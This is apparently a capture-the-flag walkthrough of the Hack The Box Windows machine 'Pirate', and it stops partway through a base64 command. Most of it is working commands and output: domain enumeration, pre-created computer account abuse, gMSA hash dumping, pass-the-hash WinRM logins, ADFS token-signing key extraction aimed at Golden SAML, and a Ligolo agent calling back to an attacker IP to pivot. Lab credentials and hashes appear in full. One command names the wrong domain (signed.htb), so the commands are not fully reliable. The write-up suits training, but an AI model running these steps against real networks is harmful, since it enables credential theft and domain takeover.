> m4rt@CTF_ARCHIVE:~$

Hack The Box / WINDOWS / 2026-09-05

Hack The Box — Pirate (Windows)

We begin with a low-privileged account on the Pirate domain, which allows us to discover pre-created computer accounts and extract sensitive gMSA passwords. Using these credentials, we gain access to the WEB01 machine. From there, a NTLM relay attack allows us to impersonate Administrator on WEB01. We harvest the credentials of a.white. Finally, we manipulate the SPNs of WEB01 to perform a resource-based constrained delegation attack, allowing us to impersonate Administrator on the domain controller.

Machine Information

As is common in real-life penetration tests, you start the Pirate box with credentials for the following account: pentest / p3nt3st2025!&.

Target

  • IP: 10.129.8.49

Port scan

sudo nmap -sC -sV 10.129.8.49 -p- -v
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-01 04:12:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T04:14:07+00:00; +8h17m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after:  2026-06-09T14:05:15
| MD5:     5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1:   0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
|_SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
443/tcp   open  https?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T04:14:08+00:00; +8h17m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after:  2026-06-09T14:05:15
| MD5:     5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1:   0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
|_SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after:  2026-06-09T14:05:15
| MD5:     5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1:   0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
|_SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
|_ssl-date: 2026-03-01T04:14:07+00:00; +8h17m15s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T04:14:07+00:00; +8h17m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after:  2026-06-09T14:05:15
| MD5:     5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1:   0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
|_SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49905/tcp open  msrpc         Microsoft Windows RPC
49928/tcp open  msrpc         Microsoft Windows RPC
49953/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Add dc01.pirate.htb and pirate.htb to /etc/hosts.

Initial enumeration

nxc smb 10.129.8.49 -u pentest -p 'p3nt3st2025!&' --shares
SMB         10.129.8.49     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.8.49     445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
SMB         10.129.8.49     445    DC01             [*] Enumerated shares
SMB         10.129.8.49     445    DC01             Share           Permissions     Remark
SMB         10.129.8.49     445    DC01             -----           -----------     ------
SMB         10.129.8.49     445    DC01             ADMIN$                          Remote Admin
SMB         10.129.8.49     445    DC01             C$                              Default share
SMB         10.129.8.49     445    DC01             IPC$            READ            Remote IPC
SMB         10.129.8.49     445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.8.49     445    DC01             SYSVOL          READ            Logon server share
nxc ldap 10.129.8.49 -u pentest -p 'p3nt3st2025!&'
[*] Initializing LDAP protocol database
LDAP        10.129.8.49     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP        10.129.8.49     389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
ldapdomaindump pirate.htb -u 'pirate.htb\pentest' -p 'p3nt3st2025!&'

bloodhound-ce-python -u 'pentest' -p 'p3nt3st2025!&' -ns 10.129.8.49 -d 'pirate.htb' -dc 'dc01.pirate.htb'  -c All --zip

We get a zip file.

Start bloodhound. On Kali linux:

sudo bloodhound

Upload the zip file.

Get a list of users:

nxc smb dc01.pirate.htb -d pirate.htb -u 'pentest' -p 'p3nt3st2025!&' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users.txt

Pre-Windows 2000 enumeration

From BloodHound, we see that the MS01$ computer account is part of the Pre-Windows 2000 Compatible Access group.

Computer accounts that are members of this group may have their password set to the lowercase username without the $, in this case ms01.

More details here: https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-precreated-computer/

Computer accounts of this type can be enumerated with nxc:

nxc ldap dc01.pirate.htb -d pirate.htb -u 'pentest' -p 'p3nt3st2025!&' -M pre2k
LDAP        10.129.11.148   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP        10.129.11.148   389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
PRE2K       10.129.11.148   389    DC01             Pre-created computer account: MS01$
PRE2K       10.129.11.148   389    DC01             Pre-created computer account: EXCH01$
PRE2K       10.129.11.148   389    DC01             [+] Found 2 pre-created computer accounts. Saved to /home/kali/.nxc/modules/pre2k/pirate.htb/precreated_computers.txt
PRE2K       10.129.11.148   389    DC01             [+] Successfully obtained TGT for ms01@pirate.htb
PRE2K       10.129.11.148   389    DC01             [+] Successfully obtained TGT for exch01@pirate.htb
PRE2K       10.129.11.148   389    DC01             [+] Successfully obtained TGT for 2 pre-created computer accounts. Saved to /home/kali/.nxc/modules/pre2k/ccache

Notice that login with nxc smb does not work:

nxc smb dc01.pirate.htb -d pirate.htb -u 'MS01$' -p 'ms01'
SMB         10.129.11.148   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None)
SMB         10.129.11.148   445    DC01             [-] pirate.htb\MS01$:ms01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

However, we can request a Kerberos ticket:

getTGT.py -dc-ip 10.129.11.148 pirate.htb/'MS01$':'ms01'
[*] Saving ticket in MS01$.ccache
export KRB5CCNAME='MS01$.ccache'

nxc smb dc01.pirate.htb -d pirate.htb -u 'MS01$' -k --use-kcache
SMB         dc01.pirate.htb 445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc01.pirate.htb 445    DC01             [+] pirate.htb\MS01$ from ccache

Reading gMSA passwords

From BloodHound, we see that MS01$ is part of the Domain Secure Servers group, which has ReadGMSAPassword relationships to the gMSA_ADCS_prod$ and gMSA_ADFS_prod$ accounts.

Modify /etc/krb5.conf.

Add:

[realms]
        PIRATE.HTB = {
                kdc = dc01.pirate.htb
                admin_server = dc01.pirate.htb
        }

[domain_realm]
        .pirate.htb = PIRATE.HTB
        pirate.htb = PIRATE.HTB

Download gMSADumper: https://github.com/micahvandeusen/gMSADumper

python gMSADumper/gMSADumper.py -k -d pirate.htb -l dc01.pirate.htb
Users or groups who can read password for gMSA_ADCS_prod$:
 > Domain Secure Servers
gMSA_ADCS_prod$:::304106f739822ea2ad8ebe23f802d078
gMSA_ADCS_prod$:aes256-cts-hmac-sha1-96:4b663e093cdb8283541c5c40068022668fbd92681eb4433d2ec0ccfc0607298d
gMSA_ADCS_prod$:aes128-cts-hmac-sha1-96:3727b5300502b7a4a8de0f429299b942
Users or groups who can read password for gMSA_ADFS_prod$:
 > Domain Secure Servers
gMSA_ADFS_prod$:::8126756fb2e69697bfcb04816e685839
gMSA_ADFS_prod$:aes256-cts-hmac-sha1-96:8c689efdec9f1b8554b1eb1b631ea311db74453427d1273369e6268bcd742e6c
gMSA_ADFS_prod$:aes128-cts-hmac-sha1-96:74ec76de3c9bf2e77d42ecc9aaa1096c
nxc smb dc01.pirate.htb -u 'gMSA_ADCS_prod$' -H '304106f739822ea2ad8ebe23f802d078'
SMB         10.129.11.148   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None)
SMB         10.129.11.148   445    DC01             [+] pirate.htb\gMSA_ADCS_prod$:304106f739822ea2ad8ebe23f802d078
nxc smb dc01.pirate.htb -u 'gMSA_ADFS_prod$' -H '8126756fb2e69697bfcb04816e685839'
SMB         10.129.11.148   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.11.148   445    DC01             [+] pirate.htb\gMSA_ADFS_prod$:8126756fb2e69697bfcb04816e685839

From BloodHound, we notice that both accounts are members of the Remote Management Users group, so we can connect to the victim machine with Evil-WinRM.

evil-winrm -i dc01.pirate.htb -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078

We get a PowerShell shell.

evil-winrm -i dc01.pirate.htb -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839

We get a PowerShell shell.

ADFS abuse

Download ADFSDump.exe and upload it to the victim machine.

Run it from the gMSA_ADFS_prod$ shell:

.\ADFSDump.exe
## Extracting Private Key from Active Directory Store
[-] Domain is pirate.htb
[-] Private Key: 7C-5B-51-35-74-58-CD-98-F0-0F-7E-CC-07-F4-60-BB-FC-7D-E9-68-95-07-4C-4E-FD-29-1B-5A-75-3A-2C-E4

Then there are some errors.

route print

We notice that there is the 192.168.100.0 subnet.

python3 bloodyAD/bloodyAD.py --host dc01.signed.htb -d signed.htb --dc-ip 10.129.11.148 -u pentest -p 'p3nt3st2025!&' get dnsDump

We notice:

recordName: WEB01.pirate.htb
A: 192.168.100.2

To access WEB01, we need to pivot.

Pivoting with ligolo

We use Ligolo.

Download Ligolo.

On the attacking machine:

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert

Upload agent.exe to the victim machine, for example to C:\tmp.

On the victim machine:

.\agent.exe -connect 10.10.16.149:11601 -ignore-cert

We connected to the proxy, and now we have a session.

ligolo-ng » session

Choose session 1.

start

Now run:

sudo ip route add 192.168.100.0/24 dev ligolo
ping 192.168.100.2
PING 192.168.100.2 (192.168.100.2) 56(84) bytes of data.
64 bytes from 192.168.100.2: icmp_seq=1 ttl=64 time=104 ms

We can communicate with WEB01.

We can also access WEB01 with Evil-WinRM:

evil-winrm -i 192.168.100.2 -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078

We do not get a PowerShell shell.

evil-winrm -i 192.168.100.2 -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839

We get a PowerShell shell.

hostname
WEB01
ls \Users
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/15/2026   7:37 PM                a.white
d-----         6/9/2025  10:11 AM                Administrator
d-----         6/9/2025   6:55 AM                Administrator.PIRATE
d-----         6/9/2025   7:31 AM                gMSA_ADFS_prod$
d-----        1/15/2026   6:40 PM                gMSA_ADFS_prod$.PIRATE
d-r---         6/8/2025   1:29 PM                Public
netstat -a -p tcp
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             WEB01:0                LISTENING
  TCP    0.0.0.0:135            WEB01:0                LISTENING
  TCP    0.0.0.0:443            WEB01:0                LISTENING
  TCP    0.0.0.0:445            WEB01:0                LISTENING
  TCP    0.0.0.0:808            WEB01:0                LISTENING
  TCP    0.0.0.0:1500           WEB01:0                LISTENING
  TCP    0.0.0.0:1501           WEB01:0                LISTENING
  TCP    0.0.0.0:5985           WEB01:0                LISTENING
  TCP    0.0.0.0:47001          WEB01:0                LISTENING
  TCP    0.0.0.0:49443          WEB01:0                LISTENING
  TCP    0.0.0.0:49664          WEB01:0                LISTENING
  TCP    0.0.0.0:49665          WEB01:0                LISTENING
  TCP    0.0.0.0:49666          WEB01:0                LISTENING
  TCP    0.0.0.0:49667          WEB01:0                LISTENING
  TCP    0.0.0.0:49668          WEB01:0                LISTENING
  TCP    0.0.0.0:49701          WEB01:0                LISTENING
  TCP    0.0.0.0:49715          WEB01:0                LISTENING
  TCP    192.168.100.2:135      pirate:50487           ESTABLISHED
  TCP    192.168.100.2:135      pirate:50498           ESTABLISHED
  TCP    192.168.100.2:135      pirate:50632           ESTABLISHED
  TCP    192.168.100.2:135      pirate:64410           ESTABLISHED
  TCP    192.168.100.2:139      WEB01:0                LISTENING
  TCP    192.168.100.2:5985     pirate:56794           TIME_WAIT
  TCP    192.168.100.2:5985     pirate:56805           TIME_WAIT
  TCP    192.168.100.2:5985     pirate:56806           ESTABLISHED
  TCP    192.168.100.2:49664    pirate:50207           ESTABLISHED
  TCP    192.168.100.2:49805    pirate:ldap            ESTABLISHED
  TCP    192.168.100.2:50003    pirate:epmap           TIME_WAIT
  TCP    192.168.100.2:50004    pirate:epmap           TIME_WAIT
  TCP    192.168.100.2:50005    pirate:49667           ESTABLISHED
  TCP    192.168.100.2:50006    pirate:49680           TIME_WAIT
  TCP    192.168.100.2:50009    pirate:49680           TIME_WAIT
  TCP    192.168.100.2:50012    pirate:49680           ESTABLISHED

Upload ADFSDump.exe to WEB01.

.\ADFSDump.exe
## Extracting Private Key from Active Directory Store
[-] Domain is pirate.htb
!!! Exception getting private key: System.DirectoryServices.DirectoryServicesCOMException (0x80072020): An operations error occurred.

   at System.DirectoryServices.DirectoryEntry.Bind(Boolean throwIfFail)
   at System.DirectoryServices.DirectoryEntry.Bind()
   at System.DirectoryServices.DirectoryEntry.get_AdsObject()
   at System.DirectoryServices.DirectorySearcher.FindAll(Boolean findMoreThanOne)
   at ADFSDump.ActiveDirectory.ADSearcher.GetPrivKey(Dictionary`2 arguments)
!!! Are you sure you are running as the AD FS service account?
## Reading Encrypted Signing Key from Database
[-] Encrypted Token Signing Key Begin
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' |
 base64 -d > TKSKey.bin
[-] Encrypted Token Signing Key End

[-] Certificate value: 5DCD035FC74E2D920F28234D0F30029DE2AC16A0
[-] Store location value: CurrentUser
[-] Store name value: My

## Reading The Issuer Identifier
[-] Issuer Identifier: http://adfs.pirate.htb/adfs/services/trust
[-] Detected AD FS 2019
[-] Uncharted territory! This might not work...
## Reading Relying Party Trust Information from Database

We can perform a Golden SAML attack.

Useful site: https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/golden-saml-attack/

echo -n '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